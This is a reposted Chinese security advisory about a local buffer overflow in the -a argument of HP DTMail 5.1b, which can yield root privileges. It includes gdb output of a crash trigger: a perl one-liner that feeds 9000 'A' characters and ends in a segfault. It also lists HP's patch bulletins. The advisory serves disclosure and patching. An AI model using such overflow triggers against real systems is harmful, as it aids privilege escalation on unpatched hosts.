 |
HP DTMail附件参数缓冲区溢出漏洞 |
|
|
| HP DTMail附件参数缓冲区溢出漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-26 15:09:05 |
|
2006-10-23 10:24:32
发布日期:2006-10-17
更新日期:2006-10-19
受影响系统:HP dtmail 5.1b 描述:
BUGTRAQ ID: 20580
HP DTMail是在桌面上使用的邮件客户端。
DTMail在处理-a选项参数时存在缓冲区溢出漏洞,本地攻击者可以利用此漏洞获得root用户权限。
以下gdb输出显示了这个漏洞:
gdb) r -a -a `perl -e 'print "A" x 9000'`
Starting program: /cluster/members/member0/tmp/dtmail -a `perl -e
'print "A"x 9000'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414140
<*来源:Adriel T. Desautels
链接:http://www.netragard.com/pdfs/research/HP-TRU64-DTMAIL-20060810.txt
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793091
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793805
*>
建议:
厂商补丁:
HP
--
HP已经为此发布了安全公告(HPSBUX02162/HPSBTU02163)以及相应补丁:
HPSBUX02162:SSRT061223 rev.1 - HP-UX Running dtmail, Local Execution of Arbitrary Code
链接:http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793091
HPSBTU02163:SSRT061223 rev.1 - HP Tru64 UNIX Running dtmail, Local Execution of Arbitrary Code
链接:http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793805
|
|
| 文章录入:admin 责任编辑:admin |
|
|
上一篇文章: Symantec Mail Security for Domino邮件中继漏洞
下一篇文章: IronWebMail目录遍历信息泄露漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
